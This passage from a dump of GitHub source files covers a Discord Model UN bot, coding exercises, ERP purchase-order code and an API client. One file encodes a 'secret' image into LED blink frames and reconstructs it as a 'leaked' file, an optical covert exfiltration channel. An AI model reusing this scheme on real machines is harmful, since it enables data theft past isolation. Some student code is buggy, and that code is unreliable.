color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(u+\" has the floor!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=(t-10))\r\n await ctx.send(\"Cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(\"10 seconds left, \"+u)\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=(10))\r\n await ctx.send(\"Cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(\"Time is up, \"+u+'!')\r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Proposes a caucus.', description='requires [type].\\n If type is mod, structure is !propose mod [total time in min] [speakers time in sec] [country proposed] [topic].\\n If other type, requires [type] [total time in min] [country proposed].')\r\n async def propose(self, ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n type=args[0]\r\n if type=='mod':\r\n try:\r\n total=int(args[1])\r\n speaking=int(args[2])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n country=args[3]\r\n topic=' '.join(word for word in args[4:])\r\n embedVar = discord.Embed(title=\"Proposal\", description=\"A motion has been proposed.\", color=discord.Color.from_rgb(78,134,219))\r\n \r\n embedVar.add_field(name=\"Proposed Caucus:\", value=type, inline=False)\r\n embedVar.add_field(name=\"Topic:\", value=topic, inline=False)\r\n embedVar.add_field(name=\"Country:\", value=country, inline=False)\r\n embedVar.add_field(name=\"Speaking Time (seconds):\", value=int(speaking), inline=False)\r\n embedVar.add_field(name=\"Total Time (minutes):\", value=int(total), inline=False)\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n else:\r\n try:\r\n total=int(args[1])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n country=args[2]\r\n embedVar = discord.Embed(title=\"Proposal\", description=\"A motion has been proposed.\", color=discord.Color.from_rgb(78,134,219))\r\n embedVar.add_field(name=\"Proposed Caucus:\", value=type, inline=False)\r\n embedVar.add_field(name=\"Country:\", value=country, inline=False)\r\n embedVar.add_field(name=\"Total Time (minutes):\", value=int(total), inline=False)\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Starts a moderated caucus.', description='Requires !mod [total time in min].\\n Starts a timer.')\r\n async def mod(self,ctx, *,args):\r\n url='https://www.youtube.com/watch?v=SK3g6f5jsRA'\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n try:\r\n t=int(args[0])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(\"The Mod has started!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=t*60)\r\n await ctx.send(\"mod cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(f\"Mod is over!\")\r\n \r\n voice_client=ctx.guild.voice_client\r\n YDL_OPTIONS = {\r\n 'format': 'bestaudio',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n 'outtmpl': 'song.%(ext)s',\r\n }\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n ydl.download([url])\r\n voice_client.play(FFmpegPCMAudio(\"song.mp3\"))\r\n voice_client.is_playing()\r\n \r\n \r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Starts a unmoderated caucus.', description='Requires !unmod [total time in min].\\n Starts a timer.')\r\n async def unmod(self,ctx, *,args):\r\n url='https://www.youtube.com/watch?v=SK3g6f5jsRA'\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n try:\r\n t=int(args[0])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(\"The UnMod has started!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=t*60)\r\n await ctx.send(\"Unmod cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(f\"UnMod is over!\")\r\n voice_client=ctx.guild.voice_client\r\n YDL_OPTIONS = {\r\n 'format': 'bestaudio',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n 'outtmpl': 'song.%(ext)s',\r\n }\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n ydl.download([url])\r\n voice_client.play(FFmpegPCMAudio(\"song.mp3\"))\r\n voice_client.is_playing()\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Register a delegate.', description='Requires !register [delegate name] [status].\\n Status can be present (p),present and voting(pv) or absent (a)')\r\n async def register(self,ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n member=args[0].lower()\r\n status= args[1]\r\n dic=self.register[ctx.guild.id]\r\n dic[member]=status\r\n if status=='p':\r\n await ctx.send(member.title()+\" is present!\")\r\n if status=='pv':\r\n await ctx.send(member.title()+\" is present and voting!\")\r\n if status=='a':\r\n await ctx.send(member.title()+\" is absent!\")\r\n elif status not in ['p','pv','a']:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Not a valid registration status. Use p, pv or a.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='View the register.', description='Displays all registered delegations and their statuses.')\r\n async def viewRegister(self,ctx):\r\n if self.session[ctx.guild.id]==True:\r\n dic=self.register[ctx.guild.id]\r\n embedVar = discord.Embed(title=\"Register\", description=\"All registered delegates.\", color=discord.Color.from_rgb(78,134,219))\r\n for k,v in dic.items():\r\n t=''\r\n if v=='p':\r\n t='Present'\r\n if v=='pv':\r\n t='Present and Voting'\r\n if v=='a':\r\n t='Absent'\r\n embedVar.add_field(name=k, value=t, inline=False)\r\n\r\n await ctx.channel.send(embed=embedVar)\r\n \r\n \r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Start a vote.', description='Starts a non-caucus vote. Useful for final vote or amendments.\\n Requires !voting [topic]')\r\n async def voting(self, ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n topic=' '.join(word for word in args)\r\n embedVar = discord.Embed(title=\"Voting\", description=\"A vote is in progress.\", color=discord.Color.from_rgb(78,134,219))\r\n embedVar.add_field(name=\"Topic:\", value=topic, inline=False)\r\n\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n \r\n\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Give Chair role.', description='Gives chair role to another member.\\n Requires !chair [@member]')\r\n async def chair(self, ctx,user: discord.Member):\r\n \r\n member = user\r\n role = get(ctx.message.guild.roles, name=\"Chair\")\r\n await member.add_roles(role)\r\n embedVar = discord.Embed(title=\"Chair Role\", description=\"Role was given to \"+str(member), color=discord.Color.from_rgb(78,134,219))\r\n \r\n\r\n m= await ctx.channel.send(embed=embedVar)\r\n \r\n \r\n \r\n\r\n \r\n \r\ndef setup(bot):\r\n bot.add_cog(Chair(bot))\r\n","repo_name":"aditepic10/MUNchkinDiscordBot","sub_path":"cogs/Chair.py","file_name":"Chair.py","file_ext":"py","file_size_in_byte":16476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"18206609032","text":"class Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n ans = 0\n zeros = 0\n\n l = 0\n for r, num in enumerate(nums):\n if num == 0:\n zeros += 1\n while zeros == 2:\n if nums[l] == 0:\n zeros -= 1\n l += 1\n ans = max(ans, r - l + 1)\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0487. Max Consecutive Ones II/0487.py","file_name":"0487.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"37312293595","text":"import requests\n\nTOKEN = None\n\n\ndef api_init(token):\n global TOKEN\n TOKEN = token\n\n\ndef api_url(path):\n return f'https://sisu.unit4.io/api{path}'\n\n\ndef request_headers(custom_headers):\n return {\n **custom_headers,\n 'Authorization': 'Bearer %s' % TOKEN,\n }\n\n\n# def request_post(url, data):\n# body = json.dumps(data).encode('utf-8')\n# headers = request_headers({\n# 'Content-Type': 'application/json',\n# })\n# req = urllib2.Request(url, headers=headers, data=body)\n# return request_send(req)\n\n\ndef request_put(url, data):\n print(f'> Req {url}')\n headers = request_headers({\n 'Content-Type': 'application/json',\n })\n\n try:\n res = requests.put(url, json=data, headers=headers)\n print(res.status_code)\n\n return res.json()\n except Exception as e:\n print(e)\n\n return None\n\n\n# def request_get(url):\n# headers = request_headers({})\n# req = urllib2.Request(url, headers=headers)\n# return request_send(req)\n\n\ndef api_set_project_file_tests(project_id, file_id, tests):\n url = api_url(f'/projects/{project_id}/file/{file_id}/tests')\n return request_put(url, tests)\n\n\ndef api_project_update_file(project_id, filename, log_list):\n log = '\\n'.join(log_list)\n data = {\n 'filename': filename,\n 'log': log,\n 'lastScanTs': 1,\n 'previewImageUrl': '',\n }\n\n res = request_put(api_url('/projects/%s/file' % project_id), data)\n\n print(filename)\n print(res)\n print(log)\n\n\ndef api_get_file_metadata(file_id):\n url = api_url(f'/data/files/{file_id}/metadata?token={TOKEN}')\n\n try:\n res = requests.get(url)\n if res.status_code == 404:\n return None\n\n return res.json()\n except Exception as e:\n print(e)\n return None\n\n\ndef api_get_file_content(file_id):\n url = api_url(f'/data/files/{file_id}/content?token={TOKEN}')\n\n try:\n res = requests.get(url)\n if res.status_code == 404:\n return None\n\n return res.content\n except Exception as e:\n print(e)\n return None\n","repo_name":"tmshv/sisu","sub_path":"sisu-worker/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42915421115","text":"import math\nangulo=int(input('angulo: '))\nv=int(input('velocidade: '))\nd=(v**2)*math.sin(math.degrees(2*angulo))/9.8\nif 98<=d<100 and 100<d<=102:\n\tprint('Muito perto')\nelif d==100:\n\tprint('Acertou!')\nelse:\n\tprint('Muito longe')\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_324/ch30_2019_04_01_13_01_41_695242.py","file_name":"ch30_2019_04_01_13_01_41_695242.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3754524852","text":"from collections import Counter\nimport math \ndef solution(weights):\n answer = 0\n seesaws = [2, 3/2, 4/3]\n \n # 배수 몸무게 세기\n for weight in weights:\n for seesaw in seesaws:\n if (weight*seesaw in weights):\n answer+=1\n \n # 같은 몸무게 세기\n same = dict(Counter(weights))\n for s in same:\n if same[s]>1:\n answer += math.comb(same[s], 2)\n \n return answer","repo_name":"KB-team3/AlgoGGang","sub_path":"길민지/Week_16/P152996_시소짝꿍.py","file_name":"P152996_시소짝꿍.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"69840086134","text":"from functools import partial\r\n\r\ndef MakeFunc(func, callback):\r\n def Run(func, callback):\r\n callback(func())\r\n return partial(Run, func, callback)\r\n\r\nasync def AsyncRunAll(loop, funcs):\r\n futures = []\r\n for fn in funcs:\r\n futures.append(loop.run_in_executor(None, fn)) \r\n for f in futures:\r\n await f\r\n return","repo_name":"dk1027/PythonQuestradeBalanceChecker","sub_path":"FuncUtils.py","file_name":"FuncUtils.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17614394691","text":"import textwrap\nfrom bitstring import BitArray\n\nNUM_OF_LEDS = 8\nFRAMES_PER_SECOND = 5\nLEN_OF_MSG_LENGTH = 6\n\nRARE_ASCII = \"00011110\"\nNEW_RARE = \"00011111\"\n\ndef _get_start_protocol(content, num_of_leds):\n start_segments = ['1' * num_of_leds]\n length = [str(format(len(content), \"08b\"))]\n return start_segments + length\n\n\ndef _identify_start(byte_stream, num_of_leds):\n for i, byte in enumerate(byte_stream):\n if byte == \"1\" * num_of_leds:\n break\n return byte_stream[i + 1:]\n\n\ndef _split_bytes(bytes_to_split, segment_length):\n return textwrap.wrap(bytes_to_split, segment_length)\n\n\ndef _read_file(file_path):\n stream = b''\n with open(file_path, 'rb') as binary_file:\n for line in binary_file.readlines():\n stream += line\n return BitArray(stream).bin\n\n\ndef _get_msg_length(byte_stream):\n raw_length = byte_stream[0]\n length = int(raw_length, 2)\n msg = byte_stream[0:length]\n return length, msg\n\n\ndef bmp_to_raw(file_path, num_of_leds):\n with open(file_path, \"rb\") as file:\n stream = file.read()\n content = textwrap.wrap(BitArray(stream).bin, num_of_leds)\n without_thrity = change_to_thirty(content)\n finished_data = replace_repeats(without_thrity)\n start = _get_start_protocol(finished_data, num_of_leds)\n return finished_data + content\n\n\ndef raw_to_bmp(byte_stream):\n hexed_data = [bytes([byte]) for byte in byte_stream]\n with open(\"leaked_img.bmp\", 'wb') as file:\n for h in hexed_data:\n file.write(h)\n\n\ndef change_to_thirty(stream):\n new_stream = []\n for byte in stream:\n if byte == RARE_ASCII:\n new_stream.append(NEW_RARE)\n else:\n new_stream.append(byte)\n return new_stream\n\n\ndef replace_repeats(stream):\n new_stream = []\n new_stream.append(stream[0])\n for i in range(1, len(stream)):\n if stream[i] == new_stream[i - 1]:\n new_stream.append(RARE_ASCII)\n else:\n new_stream.append(stream[i])\n return new_stream\n\n\ndef data_to_raw(file_path, num_of_leds):\n content = _split_bytes(_read_file(file_path), NUM_OF_LEDS)\n without_thrity = change_to_thirty(content)\n finished_data = replace_repeats(without_thrity)\n start = _get_start_protocol(finished_data, num_of_leds)\n return start + finished_data\n\n\ndef raw_to_data(byte_stream):\n decoded_msg = [chr(byte) for byte in byte_stream]\n return \"\".join(decoded_msg)\n\n\na = bmp_to_raw(r\"C:\\Users\\t8875881\\Desktop\\usb\\secret_img.bmp\", 8)","repo_name":"Savioor/sprint2","sub_path":"protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15705592383","text":"# Day 21 - Problem 24\r\n\r\n# Challenge\r\n# Write a Python class to convert a roman numeral to an integer.\r\n\r\n# Example\r\n\"\"\"\r\nSample input\r\n'MMMCMLXXXVI'\r\n'MMMM'\r\n'C'\r\n\r\nSample output\r\n3986\r\n4000\r\n100\r\n\"\"\"\r\n\r\n\r\nclass Conversion:\r\n \"\"\"\r\n Class to handle the conversion of numbers across different numeral system.\r\n \"\"\"\r\n def convert_roman_to_int(self, input):\r\n roman_values = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\r\n result = 0\r\n for i in range(len(input)):\r\n if (i > 0) and (roman_values[input[i]] > roman_values[input[i - 1]]):\r\n result += roman_values[input[i]] - 2 * roman_values[input[i - 1]]\r\n else:\r\n result += roman_values[input[i]]\r\n return result\r\n\r\n\r\nconversion = Conversion()\r\nprint(conversion.convert_roman_to_int('MMMCMLXXXVI'))\r\nprint(conversion.convert_roman_to_int('MMMM'))\r\nprint(conversion.convert_roman_to_int('C'))\r\n","repo_name":"jeffreytjs/100DayOfCode","sub_path":"class/convert_to_int.py","file_name":"convert_to_int.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20451876714","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\na = Analysis(['src\\\\git-watch.py'],\n pathex=['C:\\\\Users\\\\jacob\\\\git\\\\git-watch'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\n\na.datas += [ ('src/assets/icon.ico', '.\\\\src\\\\assets\\\\icon.ico', 'DATA') ]\n\npyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)\n\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='git-watch',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=False)\n\nimport shutil\nshutil.copyfile('config.cfg', '{0}/config.cfg'.format(DISTPATH))\n\n","repo_name":"jbmadsen/git-watch","sub_path":"git-watch-build.spec","file_name":"git-watch-build.spec","file_ext":"spec","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7934410949","text":"import funcx_web_service\n\nTEST_CONFIG = \"\"\"\\\nFOO = \"bar\"\nSECRET_VALUE = \"blah\"\nBOOL_VALUE = False\nCONTAINER_SERVICE_ENABLED = False\n\"\"\"\n\n\ndef test_read_from_config(tmp_path, monkeypatch):\n conf_file = tmp_path / \"test.config\"\n conf_file.write_text(TEST_CONFIG)\n monkeypatch.setenv(\"APP_CONFIG_FILE\", str(conf_file))\n\n app = funcx_web_service.create_app()\n assert app.config[\"FOO\"] == \"bar\"\n assert app.config[\"SECRET_VALUE\"] == \"blah\"\n assert not app.config[\"BOOL_VALUE\"]\n\n monkeypatch.setenv(\"SECRET_VALUE\", \"shhh\")\n monkeypatch.setenv(\"BOOL_VALUE\", \"true\")\n app_from_env = funcx_web_service.create_app()\n assert app_from_env.config[\"SECRET_VALUE\"] == \"shhh\"\n assert app_from_env.config[\"BOOL_VALUE\"]\n","repo_name":"funcx-faas/funcx-web-service","sub_path":"tests/unit/test_app_init.py","file_name":"test_app_init.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"33174465830","text":"import frappe,json\nfrom frappe.model.document import Document\n#from frappe.custom.doctype.custom_field.custom_field import create_custom_fields\n\nclass DealFinalize(Document):\n\tdef before_save(self):\n\t\tif self.saved:\n\t\t\tinitial_item={}\n\t\t\ti_item=[]\n\t\t\tfor row in self.deal_initiate:\n\t\t\t\ti_item.append(row.item_code)\n\t\t\t\tinitial_item[row.item_code]=row.qty\n\t\t\tfinal_item={}\n\t\t\tf_item=[]\n\t\t\tfor row in self.items:\n\t\t\t\t#row.amount=(row.qty*row.rate)\n\t\t\t\t#row.rate=row.rate/self.conversion_rate\n\t\t\t\tf_item.append(row.item_code)\n\t\t\t\tif row.item_code not in final_item:\n\t\t\t\t\t#frappe.throw(\"Item missing in table Deal Finalize \" f'{row.item_code}')\n\t\t\t\t\tfinal_item[row.item_code]=[float(row.qty)]\n\t\t\t\telse:\n\t\t\t\t\tfinal_item[row.item_code].append(float(row.qty))\n\t\t\tif not f_item:\n\t\t\t\tfrappe.throw(\"Deal Finalize Table is Empty\")\n\t\t\tr_m_item=\"\"\n\t\t\tfor row in initial_item:\n\t\t\t\tif row not in final_item:\n\t\t\t\t\tr_item=float(initial_item[row])\n\t\t\t\t\tr_m_item+=(f'for item \"{row}\" : Remaining Quantity - {r_item}<br>')\n\t\t\t\t#if not row in final_item:\n\t\t\t\t#\tr_m_item+=(f'For Item \"{row}\" : Remaining Quantity - {initial_item[row]}<br> Needs to be Filled')\n\t\t\t\telif row in final_item and float(initial_item[row])!=float(sum(final_item[row])):\n\t\t\t\t\tfrappe.errprint(i_item)\n\t\t\t\t\tfrappe.errprint(f_item)\n\t\t\t\t\tr_item=float(initial_item[row])-float(sum(final_item[row]))\n\t\t\t\t\tr_m_item+=(f'for item \"{row}\" : Remaining Quantity - {r_item}<br>')\n\t\t\tif r_m_item:\n\t\t\t\tfrappe.throw(\"Total value is not matching,<br><br>\" f'{r_m_item}')\n\t\telse:\n\t\t\tself.saved=1\n\tdef before_submit(self):\n\t\tself.before_save()\n\n@frappe.whitelist()\ndef get_rate(item,dn):\n\trate=frappe.db.get_value(\"Deal Initiate Item\",{\"parent\":dn,\"item_code\":item},\"rate\")\n\t#frappe.errprint(rate)\n\treturn rate\n\n\n\n@frappe.whitelist()\ndef make_indent(val,supplier,date,currency,price_list,name):\n\tval=json.loads(val)\n#\tfrappe.errprint(val)\n\tif not val:\n\t\tfrappe.throw(\"No rows selected\")\n\tp_details={}\n\t#frappe.errprint(val)\n\t#for row in val:\n\t#\tif row[\"payment_terms\"] == \"LC @ Sight\":\n\t#\t\trow[\"payment_terms\"]=\"LC\"\n\t#frappe.errprint(val)\n\tfor row in val:\n\t\tif row[\"payment_terms\"] not in p_details:\n\t\t\tp_details[row['payment_terms']]=[row[\"buyer\"]]\n\t\telif row['buyer'] not in p_details[row['payment_terms']]:\n\t\t\tp_details[row['payment_terms']].append(row[\"buyer\"])\n\t\t\t#p_term=row['payment_terms']\n\t\t\t#frappe.throw(\"Buyer not matching for \"f'{p_term}')\n\t#frappe.errprint(p_details)\n\tr_m_buyer=\"\"\n\tfor row in p_details:\n\t\tif(len(set(p_details[row]))>1):\n\t\t\tr_m_buyer+=(f'{row}<br>')\n\tif r_m_buyer:\n\t\tfrappe.throw(\"Buyer's not matching for Payment Terms<br><br>\" f'{r_m_buyer}')\n\telse:\n\t\tfor a_row in p_details:\n\t\t\t#frappe.errprint(\"in\")\n\t\t\tdoc=frappe.new_doc(\"Purchase Order\")\n\t\t\tdoc.supplier=supplier\n\t\t\tdoc.schedule_date=date\n\t\t#\tfrappe.errprint(currency)\n\t\t#\tfrappe.errprint(price_list)\n\t\t\tdoc.currency=currency\n\t\t\tdoc.buying_price_list=price_list\n\t\t\tflag = 0\n\t\t\tCount = 0\n\t\t\tfor row in val:\n\t\t\t\tif row[\"payment_terms\"] == a_row and row['indent'] == 0:\n\t\t\t\t\tflag = 1\n\t\t\t\t\tCount+=1\n\t\t\t\t\tdf = frappe.get_doc(\"Deal Finalize\",name)\n\t\t\t\t\tdf.items[(row['idx']-1)].indent = 1\n\t\t\t\t\tdf.save()\n\t\t\t\t\tif not doc.company == row[\"buyer\"]:\n\t\t\t\t\t\tdoc.company=row['buyer']\n\t\t\t\t\t\tw=frappe.db.get_value(\"Warehouse\",{\"warehouse_name\":\"Stores\",\"company\":row['buyer']},\"name\")\n\t\t\t\t\t\tdoc.set_warehouse=w\n\t\t\t\t\tdoc.append(\"items\",{'item_code':row['item_code'],'item_name':row['item_name'],'uom':row['uom'],'description':row['description'],'rate':row['rate'],'amount':row['amount'],'qty':row['qty'],'stock_uom':row['stock_uom'],'payment_terms':row['payment_terms'],'palletized':row['palletized'],'port':row['port'],'country_of_origin':row['country_of_origin'],'incoterms':row['incoterms'],'buyer':row['buyer']})\n\t\t\tif flag:\n\t\t\t\tdoc.linked_deal_finalize=name\n\t\t\t\tdoc.save()\n\t\t\t\tflag = 0\n\t\tif Count:\n\t\t\tfrappe.msgprint(\"Indent Created\")\n\t\telse:\n\t\t\tfrappe.msgprint('Indent Already Created for the selected record')\n\n@frappe.whitelist()\ndef make_payment_terms(self,method):\n\tif (self.items[0].payment_terms == \"DA\"):\n\t\tdoc=frappe.new_doc(\"DA\")\n\t\tval=self.items\n\t\tdoc.supplier=self.supplier\n\t\tdoc.currency=self.currency\n\t\tdoc.price_list=self.buying_price_list\n\t\tdoc.schedule_date=self.schedule_date\n\t\tdoc.company=self.company\n\t\tdoc.transaction_date=self.transaction_date\n\t\tfor row in val:\n\t\t\tdoc.append(\"items\",{'item_code':row.item_code,'item_name':row.item_name,'uom':row.uom,'description':row.description,'rate':row.rate,'amount':row.amount,'qty':row.qty,'stock_uom':row.stock_uom,'payment_terms':row.payment_terms})\n\t\tdoc.linked_indent=self.name\n\t\tdoc.total_quantity=self.total_qty\n\t\tdoc.total_in_words=self.in_words\n\t\tdoc.total_amount=self.total\n\t\tdoc.save()\n\t\tlink=\"/app/da/\"+doc.name\n\t\tfrappe.msgprint(\"DA Created <a href=\"+link+\">\"+doc.name+\"</a>\")\n\n\tif (self.items[0].payment_terms == \"LC @ Sight\"):\n\t\tdoc=frappe.new_doc(\"LC\")\n\t\tval=self.items\n\t\tdoc.supplier=self.supplier\n\t\tdoc.indent_no_c = self.indent_no_c\n\t\tdoc.company=self.company\n\t\tdoc.currency=self.currency\n\t\tdoc.price_list=self.buying_price_list\n\t\tdoc.schedule_date=self.schedule_date\n\t\tdoc.transaction_date=self.transaction_date\n\t\tfor row in val:\n\t\t\tdoc.append(\"items\",{'item_code':row.item_code,'item_name':row.item_name,'uom':row.uom,'description':row.description,'rate':row.rate,'amount':row.amount,'qty':row.qty,'stock_uom':row.stock_uom,'payment_terms':row.payment_terms})\n\t\tdoc.linked_indent=self.name\n\t\tdoc.total_quantity=self.total_qty\n\t\tdoc.total_in_words=self.in_words\n\t\tdoc.total_amount=self.total\n\t\tdoc.save()\n\t\tlink=\"/app/lc/\"+doc.name\n\t\tfrappe.msgprint(\"LC Created <a href=\"+link+\">\"+doc.name+\"</a>\")\n\n\tif (self.items[0].payment_terms == \"TT + DP\"):\n\t\tdoc=frappe.new_doc(\"TT DP\")\n\t\tval=self.items\n\t\tdoc.supplier=self.supplier\n\t\tdoc.company=self.company\n\t\tdoc.transaction_date=self.transaction_date\n\t\tdoc.schedule_date=self.schedule_date\n\t\tdoc.currency=self.currency\n\t\tdoc.price_list=self.buying_price_list\n\t\tfor row in val:\n\t\t\tdoc.append(\"items\",{'item_code':row.item_code,'item_name':row.item_name,'uom':row.uom,'description':row.description,'rate':row.rate,'amount':row.amount,'qty':row.qty,'stock_uom':row.stock_uom,'payment_terms':row.payment_terms,'hsnsac':row.gst_hsn_code})\n\t\tdoc.linked_indent=self.name\n\t\tdoc.total_quantity=self.total_qty\n\t\tdoc.total_in_words=self.in_words\n\t\tdoc.total_amount=self.total\n\t\tdoc.save()\n\t\tlink=\"/app/tt-dp/\"+doc.name\n\t\tfrappe.msgprint(\"TT DP Created <a href=\"+link+\">\"+doc.name+\"</a>\")\n\n\tif (self.items[0].payment_terms == \"LC Usance\"):\n\t\tdoc=frappe.new_doc(\"LC Usance\")\n\t\tval=self.items\n\t\tdoc.supplier=self.supplier\n\t\tdoc.company=self.company\n\t\tdoc.transaction_date=self.transaction_date\n\t\tdoc.schedule_date=self.schedule_date\n\t\tdoc.currency=self.currency\n\t\tdoc.price_list=self.buying_price_list\n\t\tfor row in val:\n\t\t\tdoc.append(\"items\",{'item_code':row.item_code,'item_name':row.item_name,'uom':row.uom,'description':row.description,'rate':row.rate,'amount':row.amount,'qty':row.qty,'stock_uom':row.stock_uom,'payment_terms':row.payment_terms})\n\t\tdoc.linked_indent=self.name\n\t\tdoc.total_quantity=self.total_qty\n\t\tdoc.total_in_words=self.in_words\n\t\tdoc.total_amount=self.total\n\t\tdoc.save()\n\t\tlink=\"/app/lc-usance/\"+doc.name\n\t\tfrappe.msgprint(\"LC Usance Created <a href=\"+link+\">\"+doc.name+\"</a>\")\n\n\n","repo_name":"gokulsng/imports","sub_path":"imports/imports/doctype/deal_finalize/deal_finalize.py","file_name":"deal_finalize.py","file_ext":"py","file_size_in_byte":7238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40775526111","text":"import datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom Database.PathDatabase import PathDatabase\nfrom MVC.model.Attività.Account import Account\nfrom MVC.model.Interfacce.sistemServiceInterface.StatisticheInterface import StatisticheInterface\nfrom MVC.model.Servizio.Categoria import Categoria\nfrom MVC.model.Servizio.Prodotto import Prodotto\nfrom MVC.model.SistemService.File import File\n\n\nclass Statistiche(StatisticheInterface):\n\n # Costruttore della classe\n def __init__(self):\n pass\n\n # Metodo per la definizione di un oggetto Statistiche\n def aggiungiStatistiche(self):\n self.rimuoviStatsConData()\n listProdotti = self.getListProdottiVenduti()\n if listProdotti == None: listProdotti= list()\n listProdottiInData = self.getProdottiVendutiInData()\n if listProdottiInData == None: listProdottiInData = list()\n self.data = datetime.datetime.today()\n self.numeroClientiProprietari = self.getNumeroClienti()\n self.prodottiVendutiTotali = len(listProdotti)\n self.prodottiVendutiInData = len(listProdottiInData)\n self.nomePrimaCategoriaTendenza = \"\"\n self.nomeSecondaCategoriaTendenza = \"\"\n self.nomeTerzaCategoriaTendenza = \"\"\n self.numeroPrimaCategoriaTendenza = 0\n self.numeroSecondaCategoriaTendenza = 0\n self.numeroTerzaCategoriaTendenza = 0\n self.guadagnoTotale = self.calcolaGuadagno(self.getListProdottiVenduti())\n self.guadagnoInData = 